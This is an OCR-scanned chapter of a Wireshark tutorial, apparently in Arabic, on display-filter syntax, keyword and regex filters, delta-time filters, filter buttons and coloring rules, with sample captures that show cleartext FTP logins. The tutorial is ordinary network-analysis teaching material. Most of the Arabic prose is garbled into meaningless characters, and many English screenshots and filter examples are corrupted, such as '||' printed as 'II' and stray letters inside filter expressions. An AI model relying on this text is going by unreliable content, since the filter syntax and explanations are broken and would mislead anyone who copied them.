HVfltQiif e B K S 



J.250 24.6.173.220 TCP 
b 199 . 181 . 132 . 250 TCP 
P 199,181,132,250 HTTP 
250 24.6173-220 HTTP 

_l_CUZl mi l_aZJ -ten -re-m 




TopH [ntciTLilf Help 

O ^ i& 5 A (M]t3 ^ ^ ^ □ 

| ^ | Ejqpwslc>fl„. Crew Appfy Sav* 



m m ^ % @ 



http > 19941 Lsyw, ack] 5t 
19941 > http Lack] Seq=l 
GET / HTTP/1 . 1 
HTTP/1 . 1 301 Moved Pfirmani 



GET / HTTP/1.1 

Accept; app 1 t cat i on/x - ms - app 1 n cat -i on , 
-i mage /j peg , appl i cat i on/xamT +xml , image/ 
gi f image/pjpieg . appl i cat "itHn/x-ms -xbap , 
app 1 i cat l on/ vrtd . ms. - exc e 1 x app 1 i cat i qui/ 
vnd . ms-powerpoint h application/fflshordj 
Accept-Language: en-US 
User-Agent: Mozi 11 a/4,0 <cc*npat ibl e; 
8,0; Windows NT 6-1: WOw64 - Trident/'l .0; 



/* 



j FtWff Out TtHi, Strom i \ SJpeu ~| 
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Filter on a Conversation from Wireshark Statistics • 
J] \c i jjsj Conversations ^ i>j Statistics j*' t> 

^ Conversations siaU <> cfjUl yr* Jj^Asj^ s-yjftfl cjU^ ^ yi\ .Conversations 

.l^j ci& ^1 Conversations 

Colorize J 'Find a Packet 'Prepare a Filter 'Apply as Filter Conversations ^ c>jVI j jJW jl>l 

. Conversation 

^ J 5 ^ <C5^ <-£^ yr* ■ ^ f^^3 s ^ o^*-? 'Prepare a Filter J Apply as Filter ^ 
i> L5^Vl iiaUxll ^ <>jVi Sjtill j J>^ j^W f .fjM ^jac- <J^ ^ Statistics I Conversations 

. Ajj^alS i "Any" ^1 j^j jt ^UJVI ^j^il jUl^l L^l .Selected ^ i>j Apply as Filter ^ 
.A ^i<Jlj A "A" ^ c^^l sa^Vi l£ "A" ^AU^a jli <TCP j UDP MOf^ CjU^ 

ip.addr==24.6.173.220 && tcp.port==19996 



|3J Cc.fi-. krt$p-espiilQlpc.spr>g 



[awmt 1 [ Ftbf e Ctn«»<] j fOCi [ ]p^-3? j JPvft | tfx| j 



TCP Conv«rsa1ions 




Hdc-tMH i Part A 
24j61732H IS9J5 



< AddiKifl < Porta 
•4flii..>?i.ia http 

1MM221M bttp 

64.71216176 http 



i PuMs * flyi« ^ FwfcrtsA^fl ^ Byte A^B * fackris A- B- 

Apply +i SiHer 
Prepare j Filter 

C«fCT« CemrllMliOll 

1Z7 131315 



ZJ*J752Jtl ccrwrSatl-Imp 65,?l2l6JV hctp 
JJjfilJJJJO ii4H.722.m htljt 

H£.i7J2» ia»i Niis.^a hop 



121 
1» 
112 

m 

UP 
90 



119 199 

lnsii 

111 JS7 

irasTQ 
ei^j 



Sriert erl 




Net Select ed 




..HirJS 










. m&t 




* 








41 


■75! 




57 


3 US 




33 






37 


3JJ1 




54 


5«3 





A — B 
A — E 
h —Any 

A — Airy 
Any-* 
Any-B 
— K 



/ N*rneies<*itiiln 



L.mrLCQdKpfcryMlw 



j "A" Lj-S l) 2 ^ (> ^J 21 Statistics I Endpoints windows <> ^l^Sf) cj(jkaJ) Lili dll^j : 4Jajal4 

Filter on a TCP Conversation Based on the Stream Index Field • 
6g JUJ! J£^l .TCP conversation ^UijV Stream Index ti> o^jVl ^ jUJ! j J>j U^l 'TCP o> jjj 
^Uijj Uj^lj 'Apply as Filter j^tj Stream Index J^Ji ^ t>/^ jjh j^^j ^ <^j^3i U\l^\ TCP cj^b t^j^ ^ 

.tcp.stream==2 cPVIS conversation 



J http-eif-n EHl.pt apr-q 



I Q | 



f+s Edit V\#v £4 i#plu« ^ruiyzf Sfriisticf Ttlcphcft^; Icols ]M«n»li Help 

mum urn bhks^ r ^**5a ia ^q^g a 

.n^C:| * t-fireiUMi,., C'efi Apply Swc 

Mo. Tun* Souk4 DtStirWtrtfi f.-cl I 

941 0.000129 24L6.173.2ZO 184 . 84 . 222 . 4S WTTP GET /p rod/ass et s/pol Ivi eigMapBt _ 
. ..^ . * 

■ Frame 541: 476 bytes on wire (3308 bits), 476 bytes captured (3808 bits) o - 

• Ethernet II , Src: Hewlett-_a7:bf :a3 (d4:85: 64:a7:bf : a3) , Dst: 96. 97.76. 1 Cz 

* Internet Protocol Version 4, Src: 24.6.173.220 (24,6.17 3.220), Dst: 184.84 
- Transmission Control Protocol, Src Port: 19943 Q9943), Dst Port; http (80 

Source port: 1994 3 (1994 3) 
^^trrfTjl i II mn^_lni|i (SO) 




Conditions Expand Display Filters with Multiple Include and Exclude *t 

fr^ll HTTP Request URI ^ ".exe' jHTTP Request Method ^ GET c> 

. (logical operator)^^^^ cUl^Ji ^l^ki^U o^j^^ 
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Use Logical Operators • 

&& or and 

Example: ip.src==10.2.2.2 && tcp.port==80 
View all IPv4 traffic from 10.2.2.2 that is to or from port 80 
II or or 

Example: tcp.port==80 II tcp.port==443 
View all TCP traffic to or from ports 80 or 443 

! or not 
Example: !arp 

View all traffic except ARP traffic 

!= or ne 
Example: tcp.flags.syn != 1 

View TCP frames that do not have the TCP S YN flag (synchronize sequence numbers) set to 1 

?ip.addr != jSlaJt ^ V IjU) • 

Incorrect: ip.addr != 10.2.2.2 

^ .IP destination address J j' IP source address J 10.2.2.2 u'j^ 1 V Jll <*>J1 lP 3 ^ 'V 
)iA .4_*>J! o^j^ ^ 'IP destination address Jj^ J IP source address Jj^ J 10.2.2.2 u'j^- 

^^Jl bjfilLi V t—fl jjuj j cor ^'^*1>»J 

Correct: lip.addr == 10.2.2.2 

^ .IP destination address J J IP source address J 10.2.2.2 u'j^' V Jll ^>J! lP 3 ^ 'V 

?!tcp.flags.syn==lj^ll J«j V I iUl • 

ciLj] ^jSj ^3 Jit TCP ^ O^J^ ^— ^ li) .LaLaj 1 - a (jjjJ L» 1 jj mi ... "=" ^ "!" ^jjaa£i <Aat* Jjj J Ijjj Ldjjc kaa 

-L Uu V jslill I* a li a SYN bit 

Incorrect: !tcp.flags.syn==l 

UDP f > JS* 'ls >Vl JjSjSjjJI p > ".1 TCP SYN bit <J JJ> ^ j^" ^ ^ ^ 

.1 Jj TCP SYN bit u^^^^ ^ *u ijflill ^ jll ARPj 

Correct: tcp.flags.syn !=1 

.0 Jj ^ J^ j SYN ^ J^ cs Jit TCP f f j*j ^ 

(Use Parentheses to Change Filter Meaning) jSttll J*-* j^U u-tjSSf) ^(^1^) 
. jjlill Jj Ja jj^j AiUiajj pLuijj jjc tiL ^aLiJI jj*!>U3l c^^*^ J^*^ (Parentheses) u^^ j^*^ ^ ^ ^ < Jc (Jj^j (jl ^ j>j 

:<JU3I (jia^xJI jj^la J ' J^ 

(tcp.port==80 && ip.src==10.2.2.2) II tcp.flags.syn==l 
tcp.port==80 && (ip.src==10.2.2.2 II tcp.flags.syn==l) 

^> J jVl ^Uj^JI c>aj^ C5 3 ) ^^V^ .80 J^ 10.2.2.2 c> o^j^ J jVl Jli^l J 

.( IPojjU^ J iiUJl p lS J c> jM\ o^u) TCP handshakes 
TCP l& c> JjVl ^>JI ^ ^^V^ -80 i^il J^ j*. i£ q± jc fjjjoi jiai Jlloll J 

.10.2.2.2 c>handshakes 
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(jjlll jl ji^YI (JjUl ^ ^J^J^ Jfl ^ La ^jc t^jiajxll JJ^li ^ia^jI dj-gUlaII Jl ^Uxi jj£I q\ c*I&al LaKs 

<jl jll (jli tllxkll t a] .*1<l ^cjIjj bUloal c^jiajc. jjlfl Jc LkaJt t *^ ui&l 4jUr. ^jLujjjI jll .(jlajxll Jj!>li Alklo lie j-<^.VI 

.(what the heck?) j» <(ti^>«) j <(Uaa> Jc Jii) *t j^ ^^aj ^ j*ll jj^la iaJai* 4_iLk 

(Syntax Check) 5*^11 u^ai jULkl <> jjj^ll ^4 jSlill &i iilill • 

tiljUijjl jll t Apply jj^ c3j^ .(jP^VI cJ**3 j^ill lP 3 ^*-^ j-^^ Alkio ^-u^l Ldic 

M ip.addr=10.2.2.2 M isn't a valid display filter: "=" was unexpected in this context 

-L Pa jxll jj^lfl £_L^il L_L-a j J jj^JJ HELP ^ J^jI 

(Syntax Check) 5^11 u^ai jULkl <> ^UL jSIill if l^al ^illll • 

.(syntax checks) ^ o-^i Jc- bUiujI <J**j * j-*^ cs-**^ ' f ^J 1 u ^ lP 3 ^*-^ Alkio Ajila LgaIo 
Oj^i :LpUll HTTP ^VU^I u> ^ .http && udp Jftll ■" (logic check) u-^»" V ^jLS^Ijll 

AjV o^ai < C5 Skla JJC. jjlill liA jl <> ad jll Jc . jjtill li$l ^ jaJI t> fc\ (JjUaJJ .UDP 'TCP 

.(syntax check) i> 
jjiaJ ^ (Syntax Check) £^11 o**± c> l)5 cH*^ ^ilkl) • 

^1 ^jUill t^A^s ^ ^ ^-^j '(Syntax Check) J~£^\ jts^l j^lall jl ^^isu 1i$£ t jL-aVl lP 3 ^^ uj^ 

j^^ j j^^Ji c> IPv4 u'j^ J CP- ^-^^ ip.addr j^Aj 6 fc* ti^^Mj 

.4^j3!j j^iJI Jil iiialt f^j c#^^ tcp.port j^l J^j 

. ji^aVI uj^^ ^ lP 3 ^ 3 ^^ j?^* Aikid ^ tiljUijjl jll q\ ^ *L jll ^^Ic LdLdj JaxIoj ip.src != 10.2.3.1 

j jUlill 4^U^ ^2 (jX^a Ua^ (1) (jjjjl j-a^^I ^jjllb j^Jaj Q^ajxJl Jxa ^11 ^ Jjj ^11 1 Ic- jj^i jjSVI c_jUujVI ;Aia j^la 

t Jjt J^au ^jl j^VI Ojlll CjIj jSlill ^li cAj fbil! Cil jU U^a -( jla jxil 4jL^ f Uj ^> lalUlVI Ajllus ^liHuub (2) 

.djUijjIjll 

(Filter on a Keyword in a Trace File) ^ ^ S ± 

jlaVI (S^- 4-^- ^ l alo ^ "admin" l!^ ^ \^ ^ ^jc cli^jj ^jl l^ja ^Ij^j l_a jjoi c _^j3I CjlajVI 

.CfijLA 11a lS^ .Lowercase j> Uppercase ^iaJjuj d^ll ^HiJ aS J ji^ ^ jl <L£U 

Use contains in a Simple Keyword Filter through an Entire Frame • 
contains "admin" jU^VI tJlUI ^ . jLLYI plajt ^ ^ ^JSII c> c^ll (contains "string") jU^VI ^I^U 
.djjjjl s jjSai^ J^U. ^ dAjjiLVI (JjjI j iAlSU jUaVI (all in lower case) admin ^Loll c-i^JU ^jij jjuj 

Uu^-d (jj^i UiAic. jiilill 11a ^Viml el u£ lil 6^JHa3I J^f^ (_ 5 -l c ' .<ijl j 2^^" CP" ^ l—li^ _(J jjuo^ j <iajjoij jlila jA 11a 
www.admin.com ^ ^jj^ij^LJI ^jjjUII Uiajl ^aLoij ^ tiljli ^fxp L - ajj^II < . ^ > ^ cJ j^-^ ^ u ^ <J Ai^^ ^ Jaas 

.adminhandbook.pdf 

Use contains in a Simple Keyword Filter based on a Field • 

<J^b C-l^jj d±£ lij t JHftll ,4jil£lt ^cjllill ^13 <j ^\ a\\ Jl^JI C5 lc Sjlaj ptall ^J^aI jjlal! pUj ^ 

^AaJLauiH ^jojI (_^JJ ^— S JJUJ tdjli j^Jl (J J > <al 9J J^^W FTP ^j^- J ^^JLuiaI! ^jojI ^ jfi^ ^11 J FTP <J 

jSlill ^ <LLu^ cil^j . JU1I ^ 4JU1I j*L& ftp.request.arg lMI ^ FTP 

ftp.request.arg contains "admin" 

.FTP ^ "admin" c> 
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No Twne Soui^e Dfc£tirtM»«i Protocol Into 

6 3,695 004 192 , 168 , 0 . 101 10,251. 30, 69 FTP Reques t : USE R anon^nous 



3j rtp-rfterrtsHStajOLpcoprhg " f^^^^ 

f Edrt if!** So £*plune 4n^t £ui>nie* TdtphKii^ I*c it ]mtf"ai5- JdHp 

at v at m m ^ h * a* a * * « v & pis e^eta mmm& a 



j | E*p*«BiG*k_ Clfcfcr Appty lave 



Frame 6: F0 bytts on wi re (560 bits), 70 bytes captured (560 bits J on interf 
■ Ethernet ll h src: lntel_d£>: 27 : d7 (00 : 18 : de; dt>: 27 : d?} h Dst: D-Link^cc ; a3 : ea C 
I internet Protocol Version 4, Src: 192 . 163 . 0. 101 £192 . loft. O. 101) , Dst; 10.251 
■>j Transmission Control Protocol, Src Port: 52912 (52912) , Dst Port: ftp (21} r 
- File Transfer Protocol CFTP} 
a USER anonymous \r \n 

Hiest command: US£R 




Use matches and (?i) in a Keyword Filter for Upper Case or Lower Case Strings • 
'(Lower case) * jj^ ^ J (Upper case) * <-* jj^ ^ j^ Admin if- ^ £^ ^ 

.(logical operator) Ajikial! cii^yLaU^JI (j^aau <Jc JLk^jj ILLm l^-i^ikloil ^ill ^pa^xJI jla ^jjoj jj 
.lUxj q\ ^jjLJI ^> ftp.request.arg contains "Admin" J^S\ j^ ftp.request.arg contains "admin" Jlill 
Regular expressions .lP 3 ^ J (PCRE) Perl-Compatible Regular Expressions ^jUjjIjI! 
'Lower case jl Upper case J ^ 3-^*^1 .^^.^ ^j^j] a ikiujj (j-^Lk ^ ^ Jjoj^^juj 

.(match operator) AiLtkJ! cj5LU* j (regex) Regular expressions ^l^i^l 4^ 



^^kioij <FTP argument J ^j^-^ 3 ^ jj^ jl jj^ c£> J "admin" < JliJI Jc- 

(?!)j Regular expressions ^^Luj c&i jj^j jjlkill CjX»U^ .ftp.request.arg matches "(?i)admin" j&ll 

buildingAeng 
buildingaeng 

jl p jjt > <~\ L_flj^^. ^jjIaKII (jj^a ^jjj j ja. L_fl^pJI tojjir > ^ L_flj^)^. djli L^jb "eng" j "building" ^ 

Lu^a lij .^jjl^Kil jjj "a" j! "A" c> ^^j* 1 ^ ."building[Aa]eng" jUal ^.^nnt 4t*SjLijj| jll J 

."building[AaBb]eng" c^^ 3 ^ ^ ^ ^ j ^j^^ 6 ^ ^-^^ J B ^ Sj^^all j» ^jji^ll lJ j^aJI U-kajl 

Use matches for a Multiple- Word Search • 
."|" j LafrL*a9 j ^jjjoj qii (ji* J^lk liUi o^^j .regex ^ s^asl1<J! cii^JI CjIaK ^a^J 4 !^j>nj Aij^ia tilUA 

( J (j^-G c5» J Djjii-j^al! jl 6j;U^3l l^jj^JI <JL^. J $.1 jjoj dog j' cat jj-^^ J uj^ a ^ ' tJ&^\ cl^f^ Jc 

. ,, (?i)(catldog)"JcijU^ jU^I ^l^i^l ^1 
Jan Goyvaerts SjLjj .(regex)M^^' J^^' ^l^ldul aI^a! cjSjJI ^> ^j^j Ik : 4JajaIa 
http://www.regular-expressions.info/ 
l^iLlS) ^ cjUoIa Regex Magicj Regex Buddy * tj^ Jl jlalUS ;djLijj)j]| Jl t>S$*j* regex 4iLbV iakkj c^IS lit 
4-jSlalAJI jjjIxIJI ^l^ll-ul .regex J^ ^ASII Jaj*^l jj^j jW^Ij ^lj J l cr^J Jan Goyvaerts Aia^ljj 

.snortj Nmap J ^jUij^ljJI J Regex 
JajxJI jj!ila J wildcards -SI ^l^o^l 
J wildcards Jj tdili 4<!UJI J .ajj^II ^LUi J djla^llkVI d^Jl Jj ^HiJ jU^Vl J 

J jlUa J jj^i ^ regular expressions c> ^ ^ j^ ^ .o^ j 15 ^ 

(•) regex AjSlalolt jjjbuil ^h^l< nl • 
J .CjIjjIslIJI ^ A-ij <LudLuj (JjI^ (matches) (3^^^! dj!>L<ilx-<i ^ regex AjlkLJI j^lxiill ~\ iklujl ^ ;tiljUijj| jll J 
^ ("\") ^I^IojI t"." lJj^JI cIa^jj .carriage returnj line break ^ja, ^1 Ji^j jli tregex 
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ftp.request.arg matches "me.r" 



:^Vl* Jti* 

VI c> (ftp.request.arg) FTP <^ aJlA^ ^ jib lJj^ jSlill 



E«t t« ^ fi* £*f*^« ft**!/* p*rrrt*t T^MfHic^ l«h Intro* b*¥ 

H « ttt « it 3 Q X 0 ^ «V # * * T A (BP) ^^l^ED » © ^ ft Eg 

H*. TnW* tart* Pflficmipn Pr-plg-itl Uirrth VHu 



3365 14, 15*54*10. 234 -1^5,254 10,121.70*151 FTP 



Request: PASS symmetry 



ftp.request.arg matches M me..r" .(•) <> o^VI 4iUbL c&jj^ jjj lJj^VI <> o^jV ^UuJl jSlill ^3 jVl 

( ) j'j^ (4j ftp.request.arg matches "me.{l,3}r" c^Vl^ .cjIjJI <> ^ ^ wildcards 

(Use Filters to Spot Communication Delays) £jVL^VI j^lte j^V jfililt ^ 4- 



.^^jujI cJ^joiJ JJ^ (.5^- 6 ^ CjIj^UII (J^Loui ^jc t 8, w \\\ jjJa ^Lau! .f-^JaJ 

-( yii3l L_iU j^fall s jjttl ^viun jl j^lj ^1 (time measurements) ^LuoL^il 

Filter on Large Delta Times (frame.time_delta) • 
jSSV jjatelt u^*^ I^a ft ^ jSla *L^I ^I^qj .<u J£3 j^V yr* 2^3 frame.time_delta lW 

lP 3 j*i f >^ 5^ yr* jMj j^l ^ ^ jW^I yr* u' ^r-^ .frame.time_delta > 1 ^^i^j ^t^l ^ l 

TCP jl UDP j^^l 6 ^ j ' cJ^I^ cjI Conversations <^>J! ajI^I s^I j aj^j ^> c^jll 

.t^j^Vl Conversations ^ ^>JI jjj* Conversations 

File I Export Specified Packets ^^i^j ^ (udp) UDP ^^i^ 'UDP c^j lJU^i^Ij ^ j£5 lil 

.aj^JI l^LJ frame.time_delta ^ 
Filter on Large TCP Delta Times (tcp.time_delta) • 
.Calculate conversation timestamps TCP preference tsljlijjljll ^ l^l^kl^l jSaj tcp.time_delta <^ 
jlii^l c>j J! c> Edit c3^> c> TCP timestamps ^ di^ ^UJI Jli^t ^1 jlalUa 
.Calculate conversation timestamps setting ^ TCP £ c>j Protocols (+) ^ c>j Preference 

U£ 6(a >JI Jj^Uj * ja. ^ TCP o-b [(Timestamp)c^J^^ ^^^] 4^ VI liA j 



f*^ £drt vitvf ftr^i* Stttidkf T*lipfrw£ Jrt^rult Jd*1p 

^oxsa Ho ^a^o eiafs^ 

irj EajKbikM»._ Cfefcf Ap|sly Save 



^040 0.GUUOQ0 ^16.239. 116 ^6 192H>S.l 64 HTTP | TCP Retransmission] C 



Filter tc-pJim^dcttd ± 1 
Mc Time 



2671 11. £85297 216. 239. 116, 76 192.168.1.64 HTTP continuation or non-HT 



23911 9.12S6B7 21G. 239. 116. 76 192.168.1.64 HTTP Continuation or non-HT 

in t 

t#inUort s"t2^ scanng racxor: -± ^unicnownjj ~ 
y checksum: Qx6fd5 [validation disabled] 
■ [SEQ/ACK analysis] 
- [Times tamp&J 



[Time since previous frame in this TCP streai 



itfCj^^^l^OO^ econ d s ] 



O t 7 lime lidta from pr^-iDus fum... PaclcrtK JJQtE Di^pSa^.«fc 4 Markeft 0 Load limr... Prrfile: wir«Uiifcl&l 
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iiL <j^aUJI 4_na^ J&Vl <>aj*ll J^ tJ^S c> -U^V^ UJ^ ^ ^ ^aUJI JJ^I J*^J g^Sl 

Create a Filter Expression Button • 

j .Save jj! (Jj^ ^ J O^J*^ ^ (jlajaJl t . u£j 4 Ll > n n , JjJ (J^aj*-Il JJ^i <Jjj^J 1^ cJ&^t (J* 

.OK J*^ ^ <^~^ cJ^-^ ^ LoS jilaJl ^jujI 1 IjS >qj 



WifKhartc Safv€ Firter 



■ 



[ 



^15 ccdj ^UJ! jl jjVl <i j£ a^Lu^ cj^ij lil .l^jL&i jSaj yr^J Filter Expression buttons c> ^ V 

. jljjVl c> ^>J! J^t yr^ J <"«" lP 3 ^ ^J^j^ 

4i 4^1^ jl ^ ^ . HTTP jj^JI JJ^i ^ <ul^L-V Filter Expression buttons ^ uLfci 4 JS^J! ^ 
jljjl ^jj ^ l^-iic jiJU <^^j <"«" <-a5Ut Lllj tiljUijj! jll ^1 ^1 (^^jj c^lj Jjj*^ 6 ^ ^ ^ ^ <^i 



Q <Sl Q B El (ft K ! B 

ete# Appl/ Save GfT|POST [s] 
flK Info 

7,2 standard query Qx022i a vmw 
Standard query response 0x02 

Standard qyery response OxB9 

http > 19941 [s¥W j, acjc] seq-O" 



CONNECT 

HEAD 

HTTP4xk 

HTTPSxk 

HTTPJxx 



Edit, Reorder, Delete, and Disable Filter Expression Buttons • 

jM\ cj! jj cj^ jjj Jul! s ^ J Edit j j V o^j 'lP 3 j*^' J^ AiSai^ Save jj 

ijll 4uoHl\ Edit tij^ J^! jl jj lS^xj j] tcJi^ jj sjIcI 4 JjaxII .(Filter Expression button) 

^JUll J£^| j^ ja US ^Filter Expressions ^ c>j Preference J^ ^ c>j 



L*/du4 
Fort 




jTh* Tint list will he- (fepljytd « Uhe full: bvttnn riQh! c*. !he Save button. 

- Orsg ?nd drop fnt«« lu cfi*^* 1 - <Qlunin tifdcf] 
Lndbled Label Filter ExpreioiDn 

Eg CONffttT http.retiue^.uii tMtlMK 'COUNECT" 
yi HJAD hpp.reqyHiLiJii eorttnf "HEAP' 
Si hETTMjcc Irttp.res^Kiflje.codc > 399 &Be htt|MeporiS*.*iMle * 509 

jyfj KttPSja bflp.rejfMtiH.cadE > 

i^j rfTTP3»i hRp.resiWfiw.iwJ* > 299 hftljUHpo n»,s^M»e ^ 403 



0 
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(Color and Export Interesting Packets) ^tj-M f j^ll £xj& 

.^I^JI (JjI^j] jl^JI c _ 5 ic liL^l ^jj^luj fib) jSI jll (jiajjjlj dua ^3 (jj^ia Ai j3U» ^ 



m Th* Wirt^KM-k N*t**ri: Analyjn 




j t*t £dfc if--* fio £*4m &nplyx¥ gtMislks TT<fep*,wijr loot ^tcr^Q 

£f M m Qt M i-E3X2a ^ * ❖ * 7 a. 1 




Firten "rj E*pfM*wan... Clear Apply Save 



SjpdrtMKfTli* Topology Change il p.type =■ = GwSO 

OS*f 5t*(t Change- «fj*-mjg != ] 




U;B| S I 



List i-i prDC«sri -n crcfrr tirlil m-at^-h uteund 
ftame.limB_i*elta * 1 1| tcp.time_<teH* > I 




String; ff*m*.linve_d**t* » i || l«p.li*ne_flifchd > 1 

Ditplay Celfcrt 5tA?u£ 

«3 © 



^jjjtil! ^1 jS SiaU jpUal .2 

( c ^jJaljjaVl cl^J^ Sjl^V £CjJatj » vw ^ L*JJ^' ft^C-lS .5 

(colorfilters '^jjiaixJI c qU^I ^1 ^Ijjuj) dfcJj^ ^A^j^-^ .6 

C5 i^aVI UttJ^\ *^ ^xJl .7 

(^ajxl\ JJ^la ^-x^a (JjjLojI ^^Jc) LfcJj^ S^clS (3fiaJ L_fl jjoj ^ill jiilill .9 

(Pango color set '^^\ ojj (o»j1!) Sjl^-all uj^ .10 

jjjtill jjoj ^Jil! ^ ^seJI jjla <ijj^a ^LijV (Expression) j^*^^ ^l^iuit . 1 1 

(color rule) u^j^ s^clS ^1 ^glc ojki J^V^ ^ \j» ^ <L^)iaj ^Lg^JI ^jjjIj ^jj liUJ <c jjoij ^j^j] 

. J^JI c j ! u^ L£ c Coloring Rule String lines j 



E*= Edit Wi«V^ £o £.*p»Wr« ^4t>0>Cf Ttlfptwr^ 1*0(5, ]nfl«*TWl3- H**p 

RMh [t| &ap«aiio*t... Clear Appty 
May Tune Source DestirwUen Protocol ln<o 

1200 000013 1^2 . 16S . 1 . 123 192 . 16S . 1 . 141 icmp Destination urire^chtAfcil e Cpo 

1201 0.O2S347 192 . 168 . 1 . 141 192 . 16J&, 1 . 12 3 NBNS Name query WBSrFAT *<OOxOO>- 

1202 0.027513 192 . 1"6S . 1 . 141 192 , H5a . 1 . 1 2 3 UDP Source port: 32903 Destina - 



- eTI 



irrterface id; O 

WTAP^E NCAP : 1 

Arrival Tirrre: Jan lO T 2006 lO: SS^ 35- . 1O0-S41OOO Pacific Standard Time 
[T-ttne shift "For this packet: 0.000000000 seconds]. 
Epoch T-rme; . 1O0541OOO seconds 

[Time delta ■Fr-cmi previous captured -Fr-aine: O - OOOOl^OOO seconds] 
[Time delta -From previosjs displayed frame: O.OOOOISOOO seconds] 
[Time since I'efci'ertce or first frame: 3 7 21. 159036000 seconds] 
Frame Number: 1200 

Frame Length : 7 2 bytes (S?6 bits> 
Capture Length: 7 2 bytes bits) 
[Frame is marked; False] 
[Fi'ame is -ignored: False] 

nrn]i in frpiHiF- FTh in~ i run in - urin - riflTfil 



[Co Tori n-g Ru 1 e N arne : I cm p e r ro-rs ] 

[coloring Ftule string: icmp. type eq 3- I I i cmp . type 
rVe^le t 11, Ue I LR^ I IIJJ LUU l 14 ! 1 1 J be ■ yji f fli . 



eq 4 II i emp . type: 



I 



Packets: Oi-:plflye^d: 2031 Hartrf O Lud t. 



Pucrfalt: ^ir«hart:tCiI 
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fjj <U£]j t^-aj jj^a £a lHa1\ lift jjj^j &£aj .colorfilters cr*^ UtJ^\ ^tjS ^ ^laflU oi l ;<Qajal4 

.Cj) jjjx^I S^LubAi (^1^1 jJl ytl\ j j^I £ua j J\ JjiiUl ljaj c Profile < il^l ^ AjP 4 IjflVi 

(Turn Off the Checksum Error Coloring Rule) l^j^I ftlail c>aai uiLLI 4. 

cAjjjaJI ^ a£ iali^U c±£ £ <>j Preference y?* IPj UDPj TCP ^ 3^>^t jia^ll c^bl^l ^LjJ jl£ til 

^C^j Ldlic. .tiL (j^aLkll £fli3l t ^ ^ laxJ L_fl jjoj (jjjl^l ^C-l j3 Hxkl <j-*a^i (jli <task Offload ~ laJLujJ ^ill 

j^V cP-^j) <^f^ *5Lkj i> (valid checksum) < jml i^t o-^^^ cte^ ^ ^ <task offloading 
^JjS^j (Jjlaxj j^il^ .cijIjUa^l! (valid checksum) < ^ ^a^ill ^L^JI ^jj JjS ^j^JI ^ mj Ja£iL ^jL^jj! jl! .4£jJo3I 

.(valid checksum) ^jW 1 ^ o-a^ill <> jSaall J^xj jl o^j^ *Ua*j 
(Disable Individual Coloring Rules) ^jil) cjjjfill l^IjS JjImj • 

jt* Ja^. ^ l^lilaxj ^jII (jjjlsll s^clS (j^ajc ^jj .Disable j l3j* A j W^**-* ^Ij^JI o^j^ s^c-lS C5 ic jiij 




4_Laajj^)3l <^lfl3l view ^ ^" u "\ ; (jjjtill jS cJ^*-^ a^jl t<il3i ^^Ic (jjjiill ^cl ja ^ J-^^ ^ » V Jaaa fr<< |ij 

.Colorize Packet List jj^ tij^ j' Colorize Packet Listj^^ 
(Build a Coloring Rule to Highlight Delays) j^^t ^ f l^J^' j^IjS f IL ^ 

dial! JjjUII *^la ^Ujj <J 

.TCP J UDP c^j CjVU^iV! ^ Cj! j^UII ^ 6 UjVI 

(jc- c ajuj^lj ^.1 j (jjjlj o^cla g-LouV 4JjUui ^I^jjojI <A'& a) .^a^Jl ^jjj djIj^Ull ^\ j^lmV ^fiiJl c aL> ojlila 4jqj^ l_L<Au 

.(high delta time) jp^ U^^ 

.^jjjtill S^c-lS 4_LaiLuj Aklald ^3^x11 

. J£ai3l ^ jjiLo U£ U^jjj ^1 ^cljSSI (j-^j New ^ c>j Coloring Rules ^ c>j View cij^ c> ^ t*LLaj 



I Wswshfift: Edrt Cster Filt*f - Profile: wiftAarklCl 



3 



F3t«r 

String; frame. t-;m«_deJU > 1 1| t<p.^rne^dflt4 > 1 




F aground t-^ipr... 
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jl jftfl *L*J 4^ta ^ ^^Vl .Pango library c> ^ Wireshark's color picker c> ^^i^JI jfr' 
"rgb.txt" c> li* (4j . https://git.gnome.Org/browse/pango/tree/pango/pango-color-table.h ^ WiJI 

^ Ia^L^jI aj t^jjlll dAliC t . llai J] Lia> t^jl jlVl s-LuJ ^ ajjj^aall 4^ mill .Xll ^J tl1 b^ ^-^SJJ^ <^"^ c£^' 

c> J^!>U . wiki/Xll color names/http://en.wikipedia.org/wiki/Xll color namesen.wikipedia.org 

m qj\\ ^ ^^L] ^j^il ^Vl AjI^j ^1 Ai^iL 4 1 c> ^ISjl l^pl j^I 
.Enter ^-^\ ^U3! J£^3I ^ jj^ ^ US cjjlll ^1 Aikia ^ orange j 'Background Color ti> j^t 

.ok ci> >l .#FFA500 'hex ^ JJ "orange" <^ P Lnlife ^ jj| j3! 




255 



fins** 1155 t 



Enter a color name and press 
Tab. Wireshark wJll replace tfie 
name with the hex value. 



a* | [ 



F4lt«M 


| Hi .me: T-Dtti/t 


String rr*mr?_hme_d*lr* > 1 || ?c p.:. rr.E_d*lta > 1 


1 LifH-ci'iK?^-^ 1 




iMfnfy UHQfSE 

F-fcrcS^TOurtdi -Colot^. [ Bwkground: C dIgi... 


status 











.New Coloring Rule c>j Colorize with Filter 







1 i " MlBi' 














Filter- 




Expression... 


10 ST 0319 5 2 

11 0.032425 


lo"l21. 70,151 
10. 234. 125. 254 


Destination- Protcrc - : Lcriptti IrVfia J 

10,234.12 5.254 ftp 88 Response: 331 Passwo 
lO. 121. 70. 151 FTP 67 Request: PASS merlin. 


* uu » 



-. PASS merl i n\jAn 

Request command : pas 



f^- f>pjnri All 
Collapse All 
Apply as, Cfl#gran 

ftpply aiHtCf 
P'*?jfe a F^ncr 
Colftwt mrthFilt*r 
F««wv TCP ftr«m 

ffl«iwv 'LW Stream 
Fd*w* SSI 5trc*m 
Copy 

feport. itfetltd P*cfcrt Bytes... 

W Filter Htltf Reference 



0000 00 Ol 96 3c 3f aft 

0010 00 35 36 44 40 GO 

0020 46 97 OS ae 00 IS 

0030 44 3d C4 c5 00 00 

004 0 ^ Od 



PfAt-iKof Preference* 
W DeexxitAt... 

Ci',;t r F-olc:j!.. 
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Quickly Colorize a Single Conversation • 

j^jj <*jta * ^ conversation l$\ J^- £y$\ j jj jSjIU ^ <TCP conversation J ^>J1 ojjfcll 
.<^> u' jl' s ^ j^ 1 ^ .y^' cJS^I > US 6 Color ljtiaJ ^3 TCP ^ c>j Colorize Conversation 

.^j^ W^' J) j' <^ J^-^ s^lc-j < (another Profile)^ <j^j ^ ^*>^ O'jftfW -t^VI ^ 




Jjj http-jece&eSl&l.pc-ipng 
F^e £<M 5£i*w Sio Capture Ajrufjrze 

91 il tf i 

Filter 



^ * * & ^ & Gigs) 



SB F 
s-E 

HI I 

H; 

000 
